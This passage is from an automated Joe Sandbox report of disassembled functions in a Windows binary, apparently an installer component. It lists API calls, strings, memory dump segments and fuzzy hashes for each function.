                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00401000: LoadStringA.USER32(?,?,004264A0,00000400), ref: 00401026
                                  • _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: StringTime_fputs$DebugFormatLoadLocalMutexObjectOutputReleaseSingleWait_fprintf_sprintf
                                  • String ID: CommandClass::ScriptError$Current Script
                                  • API String ID: 3049988156-2999272666
                                  • Opcode ID: 419cc343554f9065169b5c10bab9a570bb74dd3414fb3f8e69ae77912c6b4f1a
                                  • Instruction ID: d667340ddc8c7fc7a245f04045444f3e3fa5e062efee0d217958676bda7327c4
                                  • Opcode Fuzzy Hash: 419cc343554f9065169b5c10bab9a570bb74dd3414fb3f8e69ae77912c6b4f1a
                                  • Instruction Fuzzy Hash: 9BF0FFF1A00240A7D220BB158C03FAF72989BC8B4CF40082EF704771C2EA7C698182EF
                                  Function 004079C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • EnumWindows.USER32(Function_00007950,00000000), ref: 00407A2A
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • UninstCommandClass::NvSendMessage, xrefs: 004079C2
                                  • NvSendMessage: invalid number of arguments, xrefs: 004079E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugEnumFormatLocalMutexObjectOutputReleaseSingleStringWaitWindows_fprintf_sprintf
                                  • String ID: NvSendMessage: invalid number of arguments$UninstCommandClass::NvSendMessage
                                  • API String ID: 1975559560-3532066084
                                  • Opcode ID: 5384a3c51a7c89f310f700c0b6ff055783c6992a44b5f5a3d72d9b0471ddee57
                                  • Instruction ID: 12a72c842aab733d73b712e9640d13027d39bd6ddac5e5374347ce52616fd7b4
                                  • Opcode Fuzzy Hash: 5384a3c51a7c89f310f700c0b6ff055783c6992a44b5f5a3d72d9b0471ddee57
                                  • Instruction Fuzzy Hash: 23F02BB1B04210A7D720F73A6D06E9F66999F90718B10043FF905B32C1DA78A952C6AF
                                  Function 004083E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                    • Part of subcall function 00408280: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082A3
                                    • Part of subcall function 00408280: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 004082AE
                                    • Part of subcall function 00408280: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004082C2
                                  • SysStringLen.OLEAUT32(00000000), ref: 00408406
                                  • SysFreeString.OLEAUT32(00000000), ref: 0040842A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: String$ByteCharMultiTimeWide_fputs$AllocDebugFormatFreeLocalMutexObjectOutputReleaseSingleWait_fprintf
                                  • String ID: GetInstanceEnumerator
                                  • API String ID: 4178090673-2127802674
                                  • Opcode ID: 26f2d6fab2178db5a83f43d1191e5a273a6451add9de60d0e5c4f5b8c381ac3e
                                  • Instruction ID: ff6a69f69006609625373fdd8c3f89c73d170b279c4b8afbfc773a0bad1a6cb5
                                  • Opcode Fuzzy Hash: 26f2d6fab2178db5a83f43d1191e5a273a6451add9de60d0e5c4f5b8c381ac3e
                                  • Instruction Fuzzy Hash: 31F0E271204211AFD600DB54DC08F9B77D8EF84765F10466DF458D72D0EB749D0487AA